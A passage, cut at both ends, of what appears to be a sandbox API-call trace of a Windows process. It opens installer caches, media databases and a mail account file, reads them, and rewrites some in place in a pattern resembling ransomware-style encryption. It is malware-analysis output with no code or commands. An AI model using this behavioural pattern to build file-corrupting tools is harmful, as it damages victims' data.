dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.613] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.613] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e6 [0164.613] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.613] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.613] ReleaseMutex (hMutex=0x168) returned 1 [0164.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0164.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fedc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_PRM.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0164.614] ReadFile (in: hFile=0x130, lpBuffer=0x3cfef38, nNumberOfBytesToRead=0x6e6, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x3cfef38*, lpNumberOfBytesRead=0x2b1f2bc*=0x6e6, lpOverlapped=0x0) returned 1 [0164.614] CloseHandle (hObject=0x130) returned 1 [0164.614] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.614] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.614] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xfcec4 [0164.614] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.615] ReleaseMutex (hMutex=0x168) returned 1 [0164.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0164.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x1f8fedc, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0164.615] ReadFile (in: hFile=0x130, lpBuffer=0x3d0e028, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0164.615] ReadFile (in: hFile=0x130, lpBuffer=0x3d0e028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.615] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xfbec4 [0164.615] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.615] CloseHandle (hObject=0x130) returned 1 [0164.615] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.616] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.616] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x71630 [0164.616] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.616] ReleaseMutex (hMutex=0x168) returned 1 [0164.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0164.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x64.exe", lpUsedDefaultChar=0x0) returned 16 [0164.616] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0164.616] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x70630 [0164.616] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.617] CloseHandle (hObject=0x130) returned 1 [0164.617] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.617] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.617] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x23588 [0164.617] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.617] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.617] ReleaseMutex (hMutex=0x168) returned 1 [0164.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0164.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fedc, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0164.618] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0164.618] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22588 [0164.618] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.618] CloseHandle (hObject=0x130) returned 1 [0164.618] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.619] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.619] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6f920 [0164.619] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.619] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.619] ReleaseMutex (hMutex=0x168) returned 1 [0164.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0164.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x64.exe", lpUsedDefaultChar=0x0) returned 16 [0164.619] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0164.619] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6e920 [0164.620] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.620] CloseHandle (hObject=0x130) returned 1 [0164.620] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.620] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.620] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x71608 [0164.620] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.621] ReleaseMutex (hMutex=0x168) returned 1 [0164.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0164.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x86.exe", lpUsedDefaultChar=0x0) returned 16 [0164.621] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0164.621] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x70608 [0164.621] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.621] CloseHandle (hObject=0x130) returned 1 [0164.622] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.624] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.624] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7000 [0164.624] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.624] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.624] ReleaseMutex (hMutex=0x168) returned 1 [0164.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News~.feed-ms", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0164.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News~.feed-ms", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News~.feed-ms", lpUsedDefaultChar=0x0) returned 19 [0164.624] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.629] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6000 [0164.629] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.630] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6000 [0164.630] WriteFile (in: hFile=0x130, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.630] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0164.630] WriteFile (in: hFile=0x130, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.631] CloseHandle (hObject=0x130) returned 1 [0164.631] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.632] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.632] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x105000 [0164.632] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.633] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.633] ReleaseMutex (hMutex=0x168) returned 1 [0164.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CurrentDatabase_372.wmdb", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0164.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CurrentDatabase_372.wmdb", cchWideChar=24, lpMultiByteStr=0x1f8fedc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CurrentDatabase_372.wmdb", lpUsedDefaultChar=0x0) returned 24 [0164.633] ReadFile (in: hFile=0x130, lpBuffer=0x3d0e028, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0164.635] ReadFile (in: hFile=0x130, lpBuffer=0x3d0e028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.636] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x104000 [0164.637] ReadFile (in: hFile=0x130, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.640] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x104000 [0164.641] WriteFile (in: hFile=0x130, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.642] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0164.642] WriteFile (in: hFile=0x130, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0164.644] WriteFile (in: hFile=0x130, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.644] CloseHandle (hObject=0x130) returned 1 [0164.644] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.647] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.647] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x410 [0164.647] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.647] ReleaseMutex (hMutex=0x168) returned 1 [0164.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0164.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x1fa54dc, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="07_TV_recorded_in_the_last_week.wpl", lpUsedDefaultChar=0x0) returned 35 [0164.648] ReadFile (in: hFile=0x130, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x410, lpOverlapped=0x0) returned 1 [0165.044] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.044] WriteFile (in: hFile=0x130, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x998, lpOverlapped=0x0) returned 1 [0165.045] CloseHandle (hObject=0x130) returned 1 [0165.045] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.047] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.047] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6c8 [0165.047] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.047] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.048] ReleaseMutex (hMutex=0x168) returned 1 [0165.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 